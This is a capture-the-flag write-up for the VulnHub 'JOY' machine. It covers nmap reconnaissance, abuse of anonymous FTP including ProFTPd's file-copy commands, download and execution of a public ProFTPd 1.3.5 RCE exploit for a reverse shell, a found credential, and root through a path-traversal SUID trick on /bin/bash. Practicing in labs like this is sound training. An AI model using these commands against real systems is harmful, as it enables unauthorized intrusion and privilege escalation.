Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "192.168.72.130 joy.vhub" >> /etc/hosts
hosts file entry
Okay now onto the hacking!
Reconnaissance
As always, I started off with an NMAP scan against the machine.
┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY] └─# nmap -Pn -sV -sC -oN initial joy.vhub
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( nmap.org ) at 2021-02-25 04:34 EST Nmap scan report for joy.vhub (192.168.72.133) Host is up (0.000046s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download |_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload 22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0) 25/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-ls: Volume / | SIZE TIME FILENAME | - 2016-07-19 20:03 ossec/ | |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Index of / 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: CAPA UIDL SASL AUTH-RESP-CODE PIPELINING RESP-CODES TOP STLS |_ssl-date: TLS randomness does not represent time 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: more IDLE ENABLE LOGINDISABLEDA0001 STARTTLS capabilities listed LITERAL+ post-login SASL-IR have ID Pre-login OK LOGIN-REFERRALS IMAP4rev1 |_ssl-date: TLS randomness does not represent time 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) 465/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_ssl-date: TLS randomness does not represent time 587/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_ssl-date: TLS randomness does not represent time 993/tcp open ssl/imaps? | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Not valid before: 2019-01-27T17:23:23 |_Not valid after: 2032-10-05T17:23:23 |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3s? | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Not valid before: 2019-01-27T17:23:23 |_Not valid after: 2032-10-05T17:23:23 |_ssl-date: TLS randomness does not represent time MAC Address: 00:0C:29:04:EF:C6 (VMware) Service Info: Hosts: The, JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s |nbstat: NetBIOS name: JOY, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: joy | NetBIOS computer name: JOY\x00 | Domain name: \x00 | FQDN: joy | System time: 2021-02-25T17:34:41+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challengeresponse: supported | messagesigning: disabled (dangerous, but default) | smb2-security-mode: | 2.02: | Message signing enabled but not required | smb2-time: | date: 2021-02-25T09:34:41 |_ start_date: N/A
Scanning & Enumeration
Based on the scan that was run, I realized that port 21 was running a FTP server and allowed anonymous users to connect and interact.
I then executed the following command to dump the whole anon root to my local system:
wget -m ftp://anonymous:anonymous@joy.vhub
In the downloaded directory was a text file which revealed the directory listing of the user patrick. In there was an interesting file named version_control
I then used the unsecured FTP server to copy this file from the user patrick's home directory to the anon root's ftp directory. By this way I could view it locally without having access to the machine.
site cpft site cpto
version_control
This file revealed that the machine was running ProFTPd: 1.3.5. After digging the net for awhile, I found this RCE exploit on github for this particular version of ProFTPd.
Exploitation
┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY] └─# wget raw.githubusercontent.com/thegingerninja/Pr..
┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY] └─# ./exploit_proftd_1_3_5.py
I then caught the incoming shell with a netcat listener.
Lateral Movement
I then ran linpeas.sh as always which revealed an interesting file in the web directory.
Accessing this file gave me access to user patrick's credentials but not root.
patrick:apollo098765
Privilege Escalation
I first ran sudo -l to check for any binaries that the user patrick was authorized to run as root.
This revealed that patrick could run this one binary test with sudo perms.
The binary seemed to be some sort of application which can be used to change perms of files. My theory was to set sticky [SUID] bit on the bash binary and exploit the -p option that bash had. Read More
I then ran the application and when prompted for the file name in "this directory", I specified ../../../../../bin/bash. This would ensure that I climb out of "this directory"
Lastly, I ran /bin/bash -p and gained root access to the machine~!
ROOTY!